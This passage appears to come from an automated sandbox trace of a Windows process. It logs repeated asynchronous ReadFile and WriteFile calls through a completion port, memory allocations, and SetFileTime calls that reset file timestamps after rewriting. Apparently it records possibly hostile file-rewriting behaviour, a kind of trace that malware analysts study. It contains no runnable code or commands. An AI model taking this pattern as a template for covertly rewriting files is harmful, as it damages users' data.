(_Block=0x53fcc0) [0081.267] free (_Block=0x2062eb8) [0081.268] WriteFile (in: hFile=0x3b8, lpBuffer=0x20abb14*, nNumberOfBytesToWrite=0x61c, lpNumberOfBytesWritten=0x0, lpOverlapped=0x20abae0 | out: lpBuffer=0x20abb14*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x20abae0) returned 1 [0081.268] GetLastError () returned 0x3e5 [0081.268] GetQueuedCompletionStatus (in: CompletionPort=0x1e4, lpNumberOfBytesTransferred=0x2b8fc4c, lpCompletionKey=0x2b8fc5c, lpOverlapped=0x2b8fc58, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2b8fc4c, lpCompletionKey=0x2b8fc5c, lpOverlapped=0x2b8fc58) returned 1 [0081.291] WriteFile (in: hFile=0x3b8, lpBuffer=0x20abb14*, nNumberOfBytesToWrite=0x330, lpNumberOfBytesWritten=0x0, lpOverlapped=0x20abae0 | out: lpBuffer=0x20abb14*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x20abae0) returned 1 [0081.291] GetLastError () returned 0x3e5 [0081.291] GetQueuedCompletionStatus (in: CompletionPort=0x1e4, lpNumberOfBytesTransferred=0x2b8fc4c, lpCompletionKey=0x2b8fc5c, lpOverlapped=0x2b8fc58, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2b8fc4c, lpCompletionKey=0x2b8fc5c, lpOverlapped=0x2b8fc58) returned 1 [0081.311] ReadFile (in: hFile=0x3b0, lpBuffer=0x206b894, nNumberOfBytesToRead=0x1e8, lpNumberOfBytesRead=0x0, lpOverlapped=0x206b860 | out: lpBuffer=0x206b894*, lpNumberOfBytesRead=0x0, lpOverlapped=0x206b860) returned 1 [0081.311] GetLastError () returned 0x3e5 [0081.311] GetQueuedCompletionStatus (in: CompletionPort=0x1e4, lpNumberOfBytesTransferred=0x2b8fc4c, lpCompletionKey=0x2b8fc5c, lpOverlapped=0x2b8fc58, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2b8fc4c, lpCompletionKey=0x2b8fc5c, lpOverlapped=0x2b8fc58) returned 1 [0081.319] calloc (_Count=0x40, _Size=0x4) returned 0x2060778 [0081.319] calloc (_Count=0x41, _Size=0x4) returned 0x2062eb8 [0081.319] memcpy (in: _Dst=0x2062eb8, _Src=0x2060778, _Size=0x100 | out: _Dst=0x2062eb8) returned 0x2062eb8 [0081.320] free (_Block=0x2060778) [0081.320] calloc (_Count=0x41, _Size=0x4) returned 0x2062da0 [0081.320] calloc (_Count=0x82, _Size=0x4) returned 0x53fcc0 [0081.321] free (_Block=0x2062da0) [0081.321] free (_Block=0x53fcc0) [0081.321] free (_Block=0x2062eb8) [0081.322] WriteFile (in: hFile=0x3c0, lpBuffer=0x394007c*, nNumberOfBytesToWrite=0x617, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3940048 | out: lpBuffer=0x394007c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3940048) returned 1 [0081.322] GetLastError () returned 0x3e5 [0081.322] GetQueuedCompletionStatus (in: CompletionPort=0x1e4, lpNumberOfBytesTransferred=0x2b8fc4c, lpCompletionKey=0x2b8fc5c, lpOverlapped=0x2b8fc58, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2b8fc4c, lpCompletionKey=0x2b8fc5c, lpOverlapped=0x2b8fc58) returned 1 [0081.972] SetFileTime (hFile=0x3b8, lpCreationTime=0x41d2cc, lpLastAccessTime=0x41d2cc, lpLastWriteTime=0x41d2cc) returned 1 [0081.972] CloseHandle (hObject=0x3b8) returned 1 [0081.975] free (_Block=0x20abae0) [0081.975] GetQueuedCompletionStatus (in: CompletionPort=0x1e4, lpNumberOfBytesTransferred=0x2b8fc4c, lpCompletionKey=0x2b8fc5c, lpOverlapped=0x2b8fc58, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2b8fc4c, lpCompletionKey=0x2b8fc5c, lpOverlapped=0x2b8fc58) returned 1 [0081.989] WriteFile (in: hFile=0x3b0, lpBuffer=0x206b894*, nNumberOfBytesToWrite=0x2b40, lpNumberOfBytesWritten=0x0, lpOverlapped=0x206b860 | out: lpBuffer=0x206b894*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x206b860) returned 1 [0081.989] GetLastError () returned 0x3e5 [0081.989] GetQueuedCompletionStatus (in: CompletionPort=0x1e4, lpNumberOfBytesTransferred=0x2b8fc4c, lpCompletionKey=0x2b8fc5c, lpOverlapped=0x2b8fc58, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2b8fc4c, lpCompletionKey=0x2b8fc5c, lpOverlapped=0x2b8fc58) returned 1 [0081.999] calloc (_Count=0x40, _Size=0x4) returned 0x2060778 [0081.999] calloc (_Count=0x41, _Size=0x4) returned 0x2062eb8 [0081.999] memcpy (in: _Dst=0x2062eb8, _Src=0x2060778, _Size=0x100 | out: _Dst=0x2062eb8) returned 0x2062eb8 [0081.999] free (_Block=0x2060778) [0081.999] calloc (_Count=0x41, _Size=0x4) returned 0x2062da0 [0081.999] calloc (_Count=0x82, _Size=0x4) returned 0x53fcc0 [0082.000] free (_Block=0x2062da0) [0082.001] free (_Block=0x53fcc0) [0082.001] free (_Block=0x2062eb8) [0082.001] WriteFile (in: hFile=0x3c0, lpBuffer=0x20abb14*, nNumberOfBytesToWrite=0x61d, lpNumberOfBytesWritten=0x0, lpOverlapped=0x20abae0 | out: lpBuffer=0x20abb14*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x20abae0) returned 1 [0082.001] GetLastError () returned 0x3e5 [0082.001] GetQueuedCompletionStatus (in: CompletionPort=0x1e4, lpNumberOfBytesTransferred=0x2b8fc4c, lpCompletionKey=0x2b8fc5c, lpOverlapped=0x2b8fc58, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2b8fc4c, lpCompletionKey=0x2b8fc5c, lpOverlapped=0x2b8fc58) returned 1 [0082.015] WriteFile (in: hFile=0x3c0, lpBuffer=0x20abb14*, nNumberOfBytesToWrite=0x2ad0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x20abae0 | out: lpBuffer=0x20abb14*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x20abae0) returned 1 [0082.015] GetLastError () returned 0x3e5 [0082.015] GetQueuedCompletionStatus (in: CompletionPort=0x1e4, lpNumberOfBytesTransferred=0x2b8fc4c, lpCompletionKey=0x2b8fc5c, lpOverlapped=0x2b8fc58, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2b8fc4c, lpCompletionKey=0x2b8fc5c, lpOverlapped=0x2b8fc58) returned 1 [0082.024] ReadFile (in: hFile=0x3c4, lpBuffer=0x206b894, nNumberOfBytesToRead=0x9655, lpNumberOfBytesRead=0x0, lpOverlapped=0x206b860 | out: lpBuffer=0x206b894*, lpNumberOfBytesRead=0x0, lpOverlapped=0x206b860) returned 1 [0082.025] GetLastError () returned 0x3e5 [0082.025] GetQueuedCompletionStatus (in: CompletionPort=0x1e4, lpNumberOfBytesTransferred=0x2b8fc4c, lpCompletionKey=0x2b8fc5c, lpOverlapped=0x2b8fc58, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2b8fc4c, lpCompletionKey=0x2b8fc5c, lpOverlapped=0x2b8fc58) returned 1 [0082.026] SetFileTime (hFile=0x3c4, lpCreationTime=0x41d2cc, lpLastAccessTime=0x41d2cc, lpLastWriteTime=0x41d2cc) returned 1 [0082.026] CloseHandle (hObject=0x3c4) returned 1 [0082.029] free (_Block=0x206b860) [0082.029] GetQueuedCompletionStatus (in: CompletionPort=0x1e4, lpNumberOfBytesTransferred=0x2b8fc4c, lpCompletionKey=0x2b8fc5c, lpOverlapped=0x2b8fc58, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2b8fc4c, lpCompletionKey=0x2b8fc5c, lpOverlapped=0x2b8fc58) returned 1 [0082.740] calloc (_Count=0x40, _Size=0x4) returned 0x2060778 [0082.740] calloc (_Count=0x41, _Size=0x4) returned 0x2062eb8 [0082.740] memcpy (in: _Dst=0x2062eb8, _Src=0x2060778, _Size=0x100 | out: _Dst=0x2062eb8) returned 0x2062eb8 [0082.740] free (_Block=0x2060778) [0082.740] calloc (_Count=0x41, _Size=0x4) returned 0x2062da0 [0082.740] calloc (_Count=0x82, _Size=0x4) returned 0x53fcc0 [0082.741] free (_Block=0x2062da0) [0082.741] free (_Block=0x53fcc0) [0082.741] free (_Block=0x2062eb8) [0082.741] WriteFile (in: hFile=0x3c0, lpBuffer=0x206b894*, nNumberOfBytesToWrite=0x61e, lpNumberOfBytesWritten=0x0, lpOverlapped=0x206b860 | out: lpBuffer=0x206b894*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x206b860) returned 1 [0082.741] GetLastError () returned 0x3e5 [0082.741] GetQueuedCompletionStatus (in: CompletionPort=0x1e4, lpNumberOfBytesTransferred=0x2b8fc4c, lpCompletionKey=0x2b8fc5c, lpOverlapped=0x2b8fc58, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2b8fc4c, lpCompletionKey=0x2b8fc5c, lpOverlapped=0x2b8fc58) returned 1 [0082.743] WriteFile (in: hFile=0x3c0, lpBuffer=0x206b894*, nNumberOfBytesToWrite=0x4d0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x206b860 | out: lpBuffer=0x206b894*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x206b860) returned 1 [0082.744] GetLastError () returned 0x3e5 [0082.744] GetQueuedCompletionStatus (in: CompletionPort=0x1e4, lpNumberOfBytesTransferred=0x2b8fc4c, lpCompletionKey=0x2b8fc5c, lpOverlapped=0x2b8fc58, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2b8fc4c, lpCompletionKey=0x2b8fc5c, lpOverlapped=0x2b8fc58) returned 1 [0082.781] ReadFile (in: hFile=0x3c4, lpBuffer=0x206b894, nNumberOfBytesToRead=0xd1, lpNumberOfBytesRead=0x0, lpOverlapped=0x206b860 | out: lpBuffer=0x206b894*, lpNumberOfBytesRead=0x0, lpOverlapped=0x206b860) returned 1 [0082.781] GetLastError () returned 0x3e5 [0082.781] GetQueuedCompletionStatus (in: CompletionPort=0x1e4, lpNumberOfBytesTransferred=0x2b8fc4c, lpCompletionKey=0x2b8fc5c, lpOverlapped=0x2b8fc58, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2b8fc4c, lpCompletionKey=0x2b8fc5c, lpOverlapped=0x2b8fc58) returned 1 [0082.782] SetFileTime (hFile=0x3c4, lpCreationTime=0x41d2cc, lpLastAccessTime=0x41d2cc, lpLastWriteTime=0x41d2cc) returned 1 [0082.782] CloseHandle (hObject=0x3c4) returned 1 [0082.783] free (_Block=0x206b860) [0082.783] GetQueuedCompletionStatus (in: CompletionPort=0x1e4, lpNumberOfBytesTransferred=0x2b8fc4c, lpCompletionKey=0x2b8fc5c, lpOverlapped=0x2b8fc58, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2b8fc4c, lpCompletionKey=0x2b8fc5c, lpOverlapped=0x2b8fc58) returned 1 [0082.807] calloc (_Count=0x40, _Size=0x4) returned 0x2060778 [0082.807] calloc (_Count=0x41, _Size=0x4) returned 0x2062eb8 [0082.807] memcpy (in: _Dst=0x2062eb8, _Src=0x2060778, _Size=0x100 | out: _Dst=0x2062eb8) returned 0x2062eb8 [0082.807] free (_Block=0x2060778) [0082.807] calloc (_Count=0x41, _Size=0x4) returned 0x2062da0 [0082.807] calloc (_Count=0x82, _Size=0x4) returned 0x53fcc0 [0082.808] free (_Block=0x2062da0) [0082.808] free (_Block=0x53fcc0) [0082.808] free (_Block=0x2062eb8) [0082.808] WriteFile (in: hFile=0x3c0, lpBuffer=0x206b894*, nNumberOfBytesToWrite=0x619, lpNumberOfBytesWritten=0x0, lpOverlapped=0x206b860 | out: lpBuffer=0x206b894*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x206b860) returned 1 [0082.808] GetLastError () returned 0x3e5 [0082.808] GetQueuedCompletionStatus (in: CompletionPort=0x1e4, lpNumberOfBytesTransferred=0x2b8fc4c, lpCompletionKey=0x2b8fc5c, lpOverlapped=0x2b8fc58, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2b8fc4c, lpCompletionKey=0x2b8fc5c, lpOverlapped=0x2b8fc58) returned 1 [0082.808] WriteFile (in: hFile=0x3c0, lpBuffer=0x206b894*, nNumberOfBytesToWrite=0x1e0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x206b860 | out: lpBuffer=0x206b894*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x206b860) returned 1 [0082.809] GetLastError () returned 0x3e5 [0082.809] GetQueuedCompletionStatus (in: CompletionPort=0x1e4, lpNumberOfBytesTransferred=0x2b8fc4c, lpCompletionKey=0x2b8fc5c, lpOverlapped=0x2b8fc58, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2b8fc4c, lpCompletionKey=0x2b8fc5c, lpOverlapped=0x2b8fc58) returned 1 [0083.360] ReadFile (in: hFile=0x3c4, lpBuffer=0x206b894, nNumberOfBytesToRead=0xd7, lpNumberOfBytesRead=0x0, lpOverlapped=0x206b860 | out: lpBuffer=0x206b894*, lpNumberOfBytesRead=0x0, lpOverlapped=0x206b860) returned 1 [0083.360] GetLastError () returned 0x3e5 [0083.360] GetQueuedCompletionStatus (in: CompletionPort=0x1e4, lpNumberOfBytesTransferred=0x2b8fc4c, lpCompletionKey=0x2b8fc5c, lpOverlapped=0x2b8fc58, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2b8fc4c, lpCompletionKey=0x2b8fc5c, lpOverlapped=0x2b8fc58) returned 1 [0083.361] SetFileTime (hFile=0x3c4, lpCreationTime=0x41d2cc, lpLastAccessTime=0x41d2cc, lpLastWriteTime=0x41d2cc) returned 1 [0083.361] CloseHandle (hObject=0x3c4) returned 1 [0084.934] free (_Block=0x206b860) [0084.934] GetQueuedCompletionStatus (in: CompletionPort=0x1e4, lpNumberOfBytesTransferred=0x2b8fc4c, lpCompletionKey=0x2b8fc5c, lpOverlapped=0x2b8fc58, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2b8fc4c, lpCompletionKey=0x2b8fc5c, lpOverlapped=0x2b8fc58) returned 1 [0086.560] calloc (_Count=0x40, _Size=0x4) returned 0x2060778 [0086.560] calloc (_Count=0x41, _Size=0x4) returned 0x2062eb8 [0086.560] memcpy (in: _Dst=0x2062eb8, _Src=0x2060778, _Size=0x100 | out: _Dst=0x2062eb8) returned 0x2062eb8 [0086.562] free (_Block=0x2060778) [0086.562] calloc (_Count=0x41, _Size=0x4) returned 0x2062da0 [0086.562] calloc (_Count=0x82, _Size=0x4) returned 0x53fcc0 [0086.562] free (_Block=0x2062da0) [0086.562] free (_Block=0x53fcc0) [0086.562] free (_Block=0x2062eb8) [0086.562] WriteFile (in: hFile=0x3c0, lpBuffer=0x206b894, nNumberOfBytesToWrite=0x613, lpNumberOfBytesWritten=0x0, lpOverlapped=0x206b860 | out: lpBuffer=0x206b894, lpNumberOfBytesWritten=0x0, lpOverlapped=0x206b860) returned 0x0 [0086.570] GetLastError () returned 0x3e5 [0086.570] GetQueuedCompletionStatus (in: CompletionPort=0x1e4, lpNumberOfBytesTransferred=0x2b8fc4c, lpCompletionKey=0x2b8fc5c, lpOverlapped=0x2b8fc58, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2b8fc4c, lpCompletionKey=0x2b8fc5c, lpOverlapped=0x2b8fc58) returned 1 [0086.595] calloc (_Count=0x40, _Size=0x4) returned 0x2060778 [0086.595] calloc (_Count=0x41, _Size=0x4) returned 0x2062eb8 [0086.595] memcpy (in: _Dst=0x2062eb8, _Src=0x2060778, _Size=0x100 | out: _Dst=0x2062eb8) returned 0x2062eb8 [0086.595] free (_Block=0x2060778) [0086.596] calloc (_Count=0x41, _Size=0x4) returned 0x2062da0 [0086.596] calloc (_Count=0x82, _Size=0x4) returned 0x53fcc0 [0086.596] free (_Block=0x2062da0) [0086.596] free (_Block=0x53fcc0) [0086.596] free (_Block=0x2062eb8) [0086.596] WriteFile (in: hFile=0x3c0, lpBuffer=0x206b894, nNumberOfBytesToWrite=0x615, lpNumberOfBytesWritten=0x0, lpOverlapped=0x206b860 | out: lpBuffer=0x206b894, lpNumberOfBytesWritten=0x0, lpOverlapped=0x206b860) returned 0x0 [0086.599] GetLastError () returned 0x3e5 [0086.599] GetQueuedCompletionStatus (in: CompletionPort=0x1e4, lpNumberOfBytesTransferred=0x2b8fc4c, lpCompletionKey=0x2b8fc5c, lpOverlapped=0x2b8fc58, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2b8fc4c, lpCompletionKey=0x2b8fc5c, lpOverlapped=0x2b8fc58) returned 1 [0087.415] calloc (_Count=0x40, _Size=0x4) returned 0x2060778 [0087.415] calloc (_Count=0x41, _Size=0x4) returned 0x2062eb8 [0087.415] memcpy (in: _Dst=0x2062eb8, _Src=0x2060778, _Size=0x100 | out: _Dst=0x2062eb8) returned 0x2062eb8 [0087.415] free (_Block=0x2060778) [0087.415] calloc (_Count=0x41, _Size=0x4) returned 0x2062da0 [0087.415] calloc (_Count=0x82, _Size=0x4) returned 0x53fcc0 [0087.416] free (_Block=0x2062da0) [0087.416] free (_Block=0x53fcc0) [0087.416] free (_Block=0x2062eb8) [0087.416] WriteFile (in: hFile=0x3c4, lpBuffer=0x206b894, nNumberOfBytesToWrite=0x614, lpNumberOfBytesWritten=0x0, lpOverlapped=0x206b860 | out: lpBuffer=0x206b894, lpNumberOfBytesWritten=0x0, lpOverlapped=0x206b860) returned 0x0 [0087.627] GetLastError () returned 0x3e5 [0087.627] GetQueuedCompletionStatus (in: CompletionPort=0x1e4, lpNumberOfBytesTransferred=0x2b8fc4c, lpCompletionKey=0x2b8fc5c, lpOverlapped=0x2b8fc58, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2b8fc4c, lpCompletionKey=0x2b8fc5c, lpOverlapped=0x2b8fc58) returned 1 [0087.959] calloc (_Count=0x40, _Size=0x4) returned 0x2060778 [0087.959] calloc (_Count=0x41, _Size=0x4) returned 0x2062eb8 [0087.959] memcpy (in: _Dst=0x2062eb8, _Src=0x2060778, _Size=0x100 | out: _Dst=0x2062eb8) returned 0x2062eb8 [0087.959] free (_Block=0x2060778) [0087.959] calloc (_Count=0x41, _Size=0x4) returned 0x2062da0 [0087.959] calloc (_Count=0x82, _Size=0x4) returned 0x53fcc0 [0087.960] free (_Block=0x2062da0) [0087.960] free (_Block=0x53fcc0) [0087.960] free (_Block=0x2062eb8) [0087.960] WriteFile (in: hFile=0x3b0, lpBuffer=0x206b894*, nNumberOfBytesToWrite=0x613, lpNumberOfBytesWritten=0x0, lpOverlapped=0x206b860 | out: lpBuffer=0x206b894*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x206b860) returned 1 [0087.961] GetLastError () returned 0x3e5 [0087.961] GetQueuedCompletionStatus (in: CompletionPort=0x1e4, lpNumberOfBytesTransferred=0x2b8fc4c, lpCompletionKey=0x2b8fc5c, lpOverlapped=0x2b8fc58, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2b8fc4c, lpCompletionKey=0x2b8fc5c, lpOverlapped=0x2b8fc58) returned 1 [0088.135] ReadFile (in: hFile=0x3b0, lpBuffer=0x206b894, nNumberOfBytesToRead=0x2ed, lpNumberOfBytesRead=0x0, lpOverlapped=0x206b860 | out: lpBuffer=0x206b894, lpNumberOfBytesRead=0x0, lpOverlapped=0x206b860) returned 0x0 [0088.146] GetLastError () returned 0x3e5 [0088.146] GetQueuedCompletionStatus (in: CompletionPort=0x1e4, lpNumberOfBytesTransferred=0x2b8fc4c, lpCompletionKey=0x2b8fc5c, lpOverlapped=0x2b8fc58, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2b8fc4c, lpCompletionKey=0x2b8fc5c, lpOverlapped=0x2b8fc58) returned 1 [0088.405] calloc (_Count=0x40, _Size=0x4) returned 0x2060778 [0088.405] calloc (_Count=0x41, _Size=0x4) returned 0x2062eb8 [0088.405] memcpy (in: _Dst=0x2062eb8, _Src=0x2060778, _Size=0x100 | out: _Dst=0x2062eb8) returned 0x2062eb8 [0088.405] free (_Block=0x2060778) [0088.405] calloc (_Count=0x41, _Size=0x4) returned 0x2062da0 [0088.405] calloc (_Count=0x82, _Size=0x4) returned 0x53fcc0 [0088.406] free (_Block=0x2062da0) [0088.406] free (_Block=0x53fcc0) [0088.406] free (_Block=0x2062eb8) [0088.406] WriteFile (in: hFile=0x3c4, lpBuffer=0x206b894, nNumberOfBytesToWrite=0x614, lpNumberOfBytesWritten=0x0, lpOverlapped=0x206b860 | out: lpBuffer=0x206b894, lpNumberOfBytesWritten=0x0, lpOverlapped=0x206b860) returned 0x0 [0088.409] GetLastError () returned 0x3e5 [0088.409] GetQueuedCompletionStatus (in: CompletionPort=0x1e4, lpNumberOfBytesTransferred=0x2b8fc4c, lpCompletionKey=0x2b8fc5c, lpOverlapped=0x2b8fc58, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2b8fc4c, lpCompletionKey=0x2b8fc5c, lpOverlapped=0x2b8fc58) returned 1 [0089.401] calloc (_Count=0x40, _Size=0x4) returned 0x2060778 [0089.401] calloc (_Count=0x41, _Size=0x4) returned 0x2062eb8 [0089.401] memcpy (in: _Dst=0x2062eb8, _Src=0x2060778, _Size=0x100 | out: _Dst=0x2062eb8) returned 0x2062eb8 [0089.401] free (_Block=0x2060778) [0089.401] calloc (_Count=0x41, _Size=0x4) returned 0x2062da0 [0089.401] calloc (_Count=0x82, _Size=0x4) returned 0x53fcc0 [0089.401] free (_Block=0x2062da0) [0089.401] free (_Block=0x53fcc0) [0089.401] free (_Block=0x2062eb8) [0089.401] WriteFile (in: hFile=0x3c4, lpBuffer=0x206b894, nNumberOfBytesToWrite=0x611, lpNumberOfBytesWritten=0x0, lpOverlapped=0x206b860 | out: lpBuffer=0x206b894, lpNumberOfBytesWritten=0x0, lpOverlapped=0x206b860) returned 0x0 [0089.404] GetLastError () returned 0x3e5 [0089.404] GetQueuedCompletionStatus (in: CompletionPort=0x1e4, lpNumberOfBytesTransferred=0x2b8fc4c, lpCompletionKey=0x2b8fc5c, lpOverlapped=0x2b8fc58, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2b8fc4c, lpCompletionKey=0x2b8fc5c, lpOverlapped=0x2b8fc58) returned 1 [0089.614] calloc (_Count=0x40, _Size=0x4) returned 0x2060778 [0089.614] calloc (_Count=0x41, _Size=0x4) returned 0x2062eb8 [0089.614] memcpy (in: _Dst=0x2062eb8, _Src=0x2060778, _Size=0x100 | out: _Dst=0x2062eb8) returned 0x2062eb8 [0089.615] free (_Block=0x2060778) [0089.615] calloc (_Count=0x41, _Size=0x4) returned 0x2062da0 [0089.615] calloc (_Count=0x82, _Size=0x4) returned 0x53fcc0 [0089.615] free (_Block=0x2062da0) [0089.615] free (_Block=0x53fcc0) [0089.615] free (_Block=0x2062eb8) [0089.615] WriteFile (in: hFile=0x3c0, lpBuffer=0x206b894, nNumberOfBytesToWrite=0x612, lpNumberOfBytesWritten=0x0, lpOverlapped=0x206b860 | out: lpBuffer=0x206b894, lpNumberOfBytesWritten=0x0, lpOverlapped=0x206b860) returned 0x0 [0089.621] GetLastError () returned 0x3e5 [0089.621] GetQueuedCompletionStatus (in: CompletionPort=0x1e4, lpNumberOfBytesTransferred=0x2b8fc4c, lpCompletionKey=0x2b8fc5c, lpOverlapped=0x2b8fc58, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2b8fc4c, lpCompletionKey=0x2b8fc5c, lpOverlapped=0x2b8fc58) returned 1 [0089.653] calloc (_Count=0x40, _Size=0x4) returned 0x2060778 [0089.653] calloc (_Count=0x41, _Size=0x4) returned 0x2062eb8 [0089.653] memcpy (in: _Dst=0x2062eb8, _Src=0x2060778, _Size=0x100 | out: _Dst=0x2062eb8) returned 0x2062eb8 [0089.653] free (_Block=0x2060778) [0089.653] calloc (_Count=0x41, _Size=0x4) returned 0x2062da0 [0089.653] calloc (_Count=0x82, _Size=0x4) returned 0x53fcc0 [0089.653] free (_Block=0x2062da0) [0089.653] free (_Block=0x53fcc0) [0089.654] free (_Block=0x2062eb8) [0089.654] WriteFile (in: hFile=0x3c4, lpBuffer=0x206b894, nNumberOfBytesToWrite=0x611, lpNumberOfBytesWritten=0x0, lpOverlapped=0x206b860 | out: lpBuffer=0x206b894, lpNumberOfBytesWritten=0x0, lpOverlapped=0x206b860) returned 0x0 [0089.659] GetLastError () returned 0x3e5 [0089.659] GetQueuedCompletionStatus (in: CompletionPort=0x1e4, lpNumberOfBytesTransferred=0x2b8fc4c, lpCompletionKey=0x2b8fc5c, lpOverlapped=0x2b8fc58, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2b8fc4c, lpCompletionKey=0x2b8fc5c, lpOverlapped=0x2b8fc58) returned 1 [0090.929] calloc (_Count=0x40, _Size=0x4) returned 0x2060778 [0090.929] calloc (_Count=0x41, _Size=0x4) returned 0x2062eb8 [0090.929] memcpy (in: _Dst=0x2062eb8, _Src=0x2060778, _Size=0x100 | out: _Dst=0x2062eb8) returned 0x2062eb8 [0090.929] free (_Block=0x2060778) [0090.929] calloc (_Count=0x41, _Size=0x4) returned 0x2062da0 [0090.929] calloc (_Count=0x82, _Size=0x4) returned 0x53fcc0 [0090.929] free (_Block=0x2062da0) [0090.929] free (_Block=0x53fcc0) [0090.929] free (_Block=0x2062eb8) [0090.929] WriteFile (in: hFile=0x3c4, lpBuffer=0x206b894, nNumberOfBytesToWrite=0x610, lpNumberOfBytesWritten=0x0, lpOverlapped=0x206b860 | out: lpBuffer=0x206b894, lpNumberOfBytesWritten=0x0, lpOverlapped=0x206b860) returned 0x0 [0090.931] GetLastError () returned 0x3e5 [0090.932] GetQueuedCompletionStatus (in: CompletionPort=0x1e4, lpNumberOfBytesTransferred=0x2b8fc4c, lpCompletionKey=0x2b8fc5c, lpOverlapped=0x2b8fc58, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2b8fc4c, lpCompletionKey=0x2b8fc5c, lpOverlapped=0x2b8fc58) returned 1 [0091.062] calloc (_Count=0x40, _Size=0x4) returned 0x2060778 [0091.062] calloc (_Count=0x41, _Size=0x4) returned 0x2062eb8 [0091.062] memcpy (in: _Dst=0x2062eb8, _Src=0x2060778, _Size=0x100 | out: _Dst=0x2062eb8) returned 0x2062eb8 [0091.062] free (_Block=0x2060778) [0091.062] calloc (_Count=0x41, _Size=0x4) returned 0x2062da0 [0091.062] calloc (_Count=0x82, _Size=0x4) returned 0x53fcc0 [0091.062] free (_Block=0x2062da0) [0091.062] free (_Block=0x53fcc0) [0091.062] free (_Block=0x2062eb8) [0091.062] WriteFile (in: hFile=0x3c0, lpBuffer=0x206b894, nNumberOfBytesToWrite=0x610, lpNumberOfBytesWritten=0x0, lpOverlapped=0x206b860 | out: lpBuffer=0x206b894, lpNumberOfBytesWritten=0x0, lpOverlapped=0x206b860) returned 0x0 [0091.064] GetLastError () returned 0x3e5 [0091.064] GetQueuedCompletionStatus (in: CompletionPort=0x1e4, lpNumberOfBytesTransferred=0x2b8fc4c, lpCompletionKey=0x2b8fc5c, lpOverlapped=0x2b8fc58, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2b8fc4c, lpCompletionKey=0x2b8fc5c, lpOverlapped=0x2b8fc58) returned 1 [0091.088] calloc (_Count=0x40, _Size=0x4) returned 0x2060778 [0091.088] calloc (_Count=0x41, _Size=0x4) returned 0x2062eb8 [0091.088] memcpy (in: _Dst=0x2062eb8, _Src=0x2060778, _Size=0x100 | out: _Dst=0x2062eb8) returned 0x2062eb8 [0091.088] free (_Block=0x2060778) [0091.088] calloc (_Count=0x41, _Size=0x4) returned 0x2062da0 [0091.088] calloc (_Count=0x82, _Size=0x4) returned 0x53fcc0 [0091.089] free (_Block=0x2062da0) [0091.089] free (_Block=0x53fcc0) [0091.089] free (_Block=0x2062eb8) [0091.089] WriteFile (in: hFile=0x3c0, lpBuffer=0x206b894, nNumberOfBytesToWrite=0x610, lpNumberOfBytesWritten=0x0, lpOverlapped=0x206b860 | out: lpBuffer=0x206b894, lpNumberOfBytesWritten=0x0, lpOverlapped=0x206b860) returned 0x0 [0091.091] GetLastError () returned 0x3e5 [0091.091] GetQueuedCompletionStatus (in: CompletionPort=0x1e4, lpNumberOfBytesTransferred=0x2b8fc4c, lpCompletionKey=0x2b8fc5c, lpOverlapped=0x2b8fc58, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2b8fc4c, lpCompletionKey=0x2b8fc5c, lpOverlapped=0x2b8fc58) returned 1 [0091.207] calloc (_Count=0x40, _Size=0x4) returned 0x2060778 [0091.208] calloc (_Count=0x41, _Size=0x4) returned 0x2062eb8 [0091.208] memcpy (in: _Dst=0x2062eb8, _Src=0x2060778, _Size=0x100 | out: _Dst=0x2062eb8) returned 0x2062eb8 [0091.208] free (_Block=0x2060778) [0091.208] calloc (_Count=0x41, _Size=0x4) returned 0x2062da0 [0091.208] calloc (_Count=0x82, _Size=0x4) returned 0x53fcc0 [0091.208] free (_Block=0x2062da0) [0091.208] free (_Block=0x53fcc0) [0091.208] free (_Block=0x2062eb8) [0091.208] WriteFile (in: hFile=0x3bc, lpBuffer=0x206b894*, nNumberOfBytesToWrite=0x610, lpNumberOfBytesWritten=0x0, lpOverlapped=0x206b860 | out: lpBuffer=0x206b894*, 